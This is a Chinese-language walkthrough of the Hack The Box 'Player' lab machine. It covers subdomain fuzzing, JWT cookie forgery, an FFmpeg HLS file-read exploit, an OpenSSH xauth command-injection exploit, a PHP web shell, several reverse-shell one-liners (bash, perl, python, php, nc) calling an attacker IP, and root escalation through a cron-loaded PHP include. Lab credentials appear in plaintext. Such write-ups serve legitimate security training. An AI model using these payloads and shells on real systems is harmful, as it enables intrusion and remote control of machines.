hackthebox Player | Wh0ale's Blog
source link: https://wh0ale.github.io/2020/01/28/hackthebox-Player/
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
今天是大年初四,我已经把无聊的电影都看了一遍。春节过得也太无聊了..
recon
nmap -sV -sT -sC -o nmapinitial player.htb
开放了80
还有22
端口
Web Enumeration
访问http://player.htb/
页面返回403-Forbidden
使用wfuzz与subdomains-top1mil-5000.txt
来自seclists
枚举子域名,并得到这些结果:
wfuzz --hc 403 -c -w subdomains-top1million-5000.txt -H "HOST: FUZZ.player.htb" http://10.10.10.145
将得到的结果添加入host
三个子域名逐个访问
发现http://staging.player.htb/
存在有意思的点
再留言处提交留言,会跳转到501.php
观察第三个数据包的响应包
HTTP/1.1 200 OK
Date: Tue, 28 Jan 2020 09:14:59 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
refresh: 0;url=501.php
Vary: Accept-Encoding
Content-Length: 818
Connection: close
Content-Type: text/html
array(3) {
[0]=>
array(4) {
["file"]=>
string(28) "/var/www/staging/contact.php"
["line"]=>
int(6)
["function"]=>
string(1) "c"
["args"]=>
array(1) {
[0]=>
&string(9) "Cleveland"
}
}
[1]=>
array(4) {
["file"]=>
string(28) "/var/www/staging/contact.php"
["line"]=>
int(3)
["function"]=>
string(1) "b"
["args"]=>
array(1) {
[0]=>
&string(5) "Glenn"
}
}
[2]=>
array(4) {
["file"]=>
string(28) "/var/www/staging/contact.php"
["line"]=>
int(11)
["function"]=>
string(1) "a"
["args"]=>
array(1) {
[0]=>
&string(5) "Peter"
}
}
}
Database connection failed.<html><br />Unknown variable user in /var/www/backup/service_config fatal error in /var/www/staging/fix.php
可以看到泄露路径
/var/www/staging/contact.php
/var/www/backup/service_config
var/www/staging/fix.php
在http://chat.player.htb/
看到Olla和Vincent之间的聊天记录,Olla向他询问了一些渗透测试报告,他回答了2件事:
- 分阶段公开敏感文件。
- 主域公开源代码,允许在发布之前访问产品。
对主域名进行目录暴破
wfuzz --hc 404 -c -w /usr/share/wordlists/dirb/common.txt http://player.htb/FUZZ
000000001: 403 10 L 30 W 277 Ch ""
000000011: 403 10 L 30 W 281 Ch ".hta"
000000012: 403 10 L 30 W 286 Ch ".htaccess"
000000013: 403 10 L 30 W 286 Ch ".htpasswd"
000002250: 301 9 L 28 W 310 Ch "launcher"
000003588: 403 10 L 30 W 290 Ch "server-status"
访问http://player.htb/launcher
输入表单,会自动跳转到http://player.htb/launcher/dee8dc8a47256c64630d803a4c40786c.php?
从聊天中我们知道源代码暴露在某个地方,我想阅读源代码,http://player.htb/launcher/dee8dc8a47256c64630d803a4c40786e.php.
因此我尝试了一些基本的操作,例如添加.swp
,.bak
以及~
在文件名之后。
看到了jwt
这个关键点
在jwt中,对cookie进行解码
上述代码的意思是
如果cookie通过'HS256'解码的值为"0E76658526655756207688271159624026011393"的话,则跳转到 7F2xxxxxxxxxxxxx/
如果cookie通过'HS256'解码的值不为"0E76658526655756207688271159624026011393"的话,跳转到index.html,就是刚才跳转的页面
所以我们需要重新制造一个cookie
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IjBFNzY2NTg1MjY2NTU3NTYyMDc2ODgyNzExNTk2MjQwMjYwMTEzOTMifQ.VXuTKqw__J4YgcgtOdNDgsLgrFjhN1_WwspYNf_FjyE
可以看到cookie变更后来到了新的页面
exploit
FFmpeg HLS漏洞–>任意文件读取
新的页面存在上传文件功能
上传文件后发现新增了一个按钮,F12查看下
<a href="http:\/\/player.htb/launcher/7F2dcsSdZo6nj3SNMTQ1/uploads/1526724324.avi">Buffed Media</a>
尝试上传一些其他格式的文件,返回的都是avi的文件类型
因此,我尝试了该ffmpeg HLS
exp,并创建了一个avi
要读取的测试/etc/passwd
,它的工作原理是:
./gen_xbin_avi.py file:///etc/passwd test.avi
file test.avi
test.avi: RIFF (little-endian) data, AVI, 224 x 160, 25.00 fps,
上传后点击Buffed Media
创建读取其他文件的avi
./gen_xbin_avi.py file:///var/www/staging/contact.php contact.avi
./gen_xbin_avi.py file:///var/www/backup/service_config service_config.avi
./gen_xbin_avi.py file:///var/www/staging/fix.php fix.avi
contact.php
没有任何有趣的内容,avi
for fix.php
为空。其中service_config
有一个名为的用户凭据telegen
:
username: telegen
password: d-bC|jC!2uepS/w
尝试登陆http://dev.player.htb/
失败
尝试登陆ssh(22)失败
使用masscan快速扫描开放端口
masscan -p1-65535 10.10.10.145 --rate=1000 -e eth0
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-29 08:59:36 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 22/tcp on 10.10.10.145
Discovered open port 80/tcp on 10.10.10.145
Discovered open port 6686/tcp on 10.10.10.145
rate: 0.00-kpps, 100.00% done, waiting -29-secs, found=3
nmap扫描端口详情
nmap -p 6686 -sT -sV --version-all 10.10.10.145
Nmap scan report for player.htb (10.10.10.145)
Host is up (0.40s latency).
PORT STATE SERVICE VERSION
6686/tcp open tcpwrapped
使用nc探测端口
~ # nc player.htb 6686
SSH-2.0-OpenSSH_7.2
发现可以ssh连接6686端口,连接上ssh后没有执行命令的权限
猜测6686端口应该是Dropbear是一个相对较小的SSH服务器和客户端。开源,在无线路由器等嵌入式linux系统中使用较多。
xauth Command Injection
searchsploit查找有没有openssh的漏洞,发现存在对应版本的漏洞
searchsploit openssh
OpenSSH 7.2p1 - (Authenticated) xauth Command Injection | exploits/multiple/remote/39569.py
python /usr/share/exploitdb/exploits/multiple/remote/39569.py player.htb 6686 telegen 'd-bC|jC!2uepS/w'
INFO:__main__:connecting to: telegen:d-bC|jC!2uepS/[email protected]:6686
参考:CVE-2016-3116 Dropbear注入漏洞分析
readfile 本地文件读取
readfile读取user.txt
.readfile /etc/passwd
.readfile /home/telegen/user.txt
写文件反弹shell失败
.writefile /tmp/testfile1
thisisatestfile
读取之前没能通过FFmpeg HLS漏洞读取成功的文件内容
#> .readfile /var/www/staging/fix.php
DEBUG:__main__:auth_cookie: 'xxxx\nsource /var/www/staging/fix.php\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:<?php
class
protected
protected
protected
public
return
}
public
if($result
static::passed($test_name);
}
static::failed($test_name);
}
}
public
if($result
static::failed($test_name);
}
static::passed($test_name);
}
}
public
if(!$username){
$username
$password
}
//modified
//for
//fix
//peter
//CQXpm\z)G5D#%S$y=
}
public
if($result
static::passed($test_name);
}
static::failed($test_name);
}
}
public
echo
echo
echo
}
private
echo
static::$failed++;
}
private
static::character(".");
static::$passed++;
}
private
echo
static::$last_echoed
}
private
if(static::$last_echoed
echo
static::$last_echoed
}
}
#>
看到了账号信息
peter
CQXpm\z)G5D#%S$y=
尝试登陆http://dev.player.htb/
Reverse shell
尝试着新建文件,但是无法新建成功。
于是想再project新建一个工程看看在工程下能不能新建文件成功。
失败,于是在/var/www/demo/home
下新建project
上传文件test.php
发现http://dev.player.htb/
的子目录下同样的可以看到test.php
wfuzz扫描http://dev.player.htb/
wfuzz --hc 404 -c -w /usr/share/wordlists/dirb/common.txt http://dev.player.htb/FUZZ
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/components (Status: 301)
/data (Status: 301)
/favicon.ico (Status: 200)
/home (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/languages (Status: 301)
/lib (Status: 301)
/plugins (Status: 301)
/server-status (Status: 403)
/themes (Status: 301)
在home目录下可以看到test.php
这时候可以上传一个反弹shell的脚本shell.php
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
我们在http://dev.player.htb/home/shell.php?cmd=id
可以看到执行的命令
nc反弹shell
bash -i >& /dev/tcp/10.10.15.142/4444 0>&1
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
php -r '$sock=fsockopen("10.10.15.142",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.142 4444 >/tmp/f
直接在小马的参数里面执行反弹shell的命令没能反弹成功,然后上传大马
这里用的家里的网,反弹shell 卡卡卡卡kkkkkkkk
Elevation
wget下载pspy
pspy是一种命令行工具,旨在无需root权限即可监听进程。它允许您在其他用户执行命令时查看它们,cron作业等。非常适合枚举CTF中的Linux系统。很好地向您的同事展示为什么在命令行中将秘密作为参数传递是一个坏主意。
执行pspy时候遇到一些权限问题
$ /tmp/pspy64s
/bin/sh: 8: /tmp/pspy64s: not found
$ cp /var/www/demo/pspy64s /tmp/pspy64s
$ /tmp/pspy64s
/bin/sh: 10: /tmp/pspy64s: Permission denied
$ chmod +x /tmp/pspy64s
$ /tmp/pspy64s
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
可以看到一条重要信息
2020/01/29 20:37:01 CMD: UID=0 PID=20002 | /usr/bin/php /var/lib/playbuff/buff.php
/var/lib/playbuff/buff.php
是作为root权限执行的
<?php
include("/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php");
class playBuff
{
public $logFile="/var/log/playbuff/logs.txt";
public $logData="Updated";
public function __wakeup()
{
file_put_contents(__DIR__."/".$this->logFile,$this->logData);
}
}
$buff = new playBuff();
$serialbuff = serialize($buff);
$data = file_get_contents("/var/lib/playbuff/merge.log");
if(unserialize($data))
{
$update = file_get_contents("/var/lib/playbuff/logs.txt");
$query = mysqli_query($conn, "update stats set status='$update' where id=1");
if($query)
{
echo 'Update Success with serialized logs!';
}
}
else
{
file_put_contents("/var/lib/playbuff/merge.log","no issues yet");
$update = file_get_contents("/var/lib/playbuff/logs.txt");
$query = mysqli_query($conn, "update stats set status='$update' where id=1");
if($query)
{
echo 'Update Success!';
}
}
?>
虽然我们无法修改其中的文件内容,但是我们可以修改/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php
<?php
$servername = "localhost";
$username = "root";
$password = "";
$dbname = "integrity";
system("bash -c /tmp/pwned.sh");
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
?>
在http://dev.player.htb/
上传文件pwned.sh,然后cp命令转移
然后kali监听就可以反弹shell了(root),这里已经看到执行了bash -c /tmp/pwned.sh
定时任务了
但是我一直等了好久都没能反弹成功
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK